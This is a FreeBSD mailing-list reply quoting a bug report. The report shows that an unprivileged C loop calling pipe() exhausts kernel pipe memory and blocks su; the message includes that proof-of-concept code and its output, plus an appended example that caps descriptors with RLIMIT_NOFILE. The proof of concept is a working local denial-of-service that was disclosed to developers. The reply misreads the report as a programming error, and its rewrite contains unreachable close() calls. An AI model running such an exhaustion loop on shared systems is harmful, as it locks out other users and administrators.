Date: Mon, 7 Apr 2014 13:42:35 +0200
From: Eduardo Morras <emorrasg@yahoo.es>
To: freebsd-hackers@freebsd.org
Subject: Re: pipe() resource exhaustion
Message-ID: <20140407134235.eed2e9555c76f5834d991bfa@yahoo.es>
In-Reply-To: <lhu0jv$r6n$1@ger.gmane.org>
References: <lhu0jv$r6n$1@ger.gmane.org>

On Mon, 07 Apr 2014 13:02:22 +0200
Ivan Voras <ivoras@freebsd.org> wrote:

> Hello,
>
> Last time I mentioned this it didn't get any attention, so I'll try
> again. By accident (via a buggy synergy server process) I found that a
> simple userland process can exhaust kernel pipe memory
> (kern.ipc.pipekva sysctl) which as a consequence has that new
> processes which use pipe cannot be started, which includes "su", by
> which an administrator could kill such a process.
>
> The description is simple enough, I don't think a proof of concept is
> really needed, but here it is:
>
> step 1:
> run this as a normal, non-root user:
>
> #include <stdlib.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <errno.h>
> #include <err.h>
> #include <string.h>
>
> int main() {
>         int fd[2];
>         int is_error = 0;
>
>         while (1) {
>                 if (pipe(fd) != 0) {
>                         if (!is_error) {
>                                 printf("%s\n", strerror(errno));
>                                 is_error = 1;
>                         }
>                 }
>         }
> }
>
> step 2:
> try and fail to run "su" in another terminal:
>
> $ su
> Password:
> su: pipe: Cannot allocate memory
>
> I'm sure this has other implications as well :)
>

Each time you call pipe(fd) inside the while, you create a new pipe. Perhaps you wanted to say:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <err.h>
#include <string.h>

int main() {
        int fd[2];
        int is_error = 0;

        /* Create the pipe once, before the loop */
        if (pipe(fd) != 0) {
                if (!is_error) {
                        printf("%s\n", strerror(errno));
                        is_error = 1;
                }
        }

        while (1) {
                /* Do whatever you want with pipe fd */
        }

        /* close() takes a single descriptor, so close both ends */
        close(fd[0]);
        close(fd[1]);
}

Synergy server process, as you said, is buggy if it does things as your example program does.

> The problem isn't present on all systems: on some it looks like the
> limit on fd's is reached faster than the limit on pipekva. Of 5
> machines I tested, 3 running 9.x and 2 running 10.x, both machines
> running 10.x exhaust pipekva before fd's, while only one machine
> running 9.x did that. Neither machine had increased fd limits above
> the autotuned defaults.
>
> Anecdotally, a machine which was running 9.x didn't experience this
> problem with synergys, but it did when upgraded to 10.x with no change
> to sysctl configuration.

Often short-lived buggy processes don't show any problems because they exit before they happen.

---   ---
Eduardo Morras <emorrasg@yahoo.es>
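
The quoted report notes that on some machines the fd limit is reached before pipekva. The following added example (not part of the original message or of FreeBSD) shows that mitigation from the process side: with a low soft RLIMIT_NOFILE, pipe() fails with EMFILE after a small, bounded number of pipes, instead of the ENOMEM ("Cannot allocate memory") seen in the su output above. The function name pipes_until_limit, the cap of 64 and MAX_PIPES are assumptions chosen for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <unistd.h>

#define MAX_PIPES 512   /* hard bound on the demonstration loop */

/* Lower the soft RLIMIT_NOFILE to soft_cap, create pipes until pipe()
 * fails, then close every pipe and restore the saved limit.
 * Returns the number of pipes created (-1 on setup failure) and stores
 * the errno of the failing pipe() call in *err_out (0 if none failed). */
int pipes_until_limit(rlim_t soft_cap, int *err_out)
{
        struct rlimit saved, capped;
        int fds[MAX_PIPES][2];
        int n = 0;

        *err_out = 0;
        if (getrlimit(RLIMIT_NOFILE, &saved) != 0)
                return -1;
        capped = saved;
        capped.rlim_cur = soft_cap < saved.rlim_max ? soft_cap : saved.rlim_max;
        if (setrlimit(RLIMIT_NOFILE, &capped) != 0)
                return -1;

        while (n < MAX_PIPES) {
                if (pipe(fds[n]) != 0) {
                        /* EMFILE: per-process fd limit; ENOMEM: pipe memory */
                        *err_out = errno;
                        break;
                }
                n++;
        }
        for (int i = 0; i < n; i++) {
                close(fds[i][0]);
                close(fds[i][1]);
        }
        setrlimit(RLIMIT_NOFILE, &saved);   /* restore the original soft limit */
        return n;
}

int main(void)
{
        int err;
        int n = pipes_until_limit(64, &err);
        printf("created %d pipes, then: %s\n", n, err ? strerror(err) : "no error");
        return 0;
}
```

An errno of EMFILE here means the per-process descriptor limit stopped the loop; seeing ENOMEM instead would mean pipe memory ran out first, as on the 10.x machines in the report.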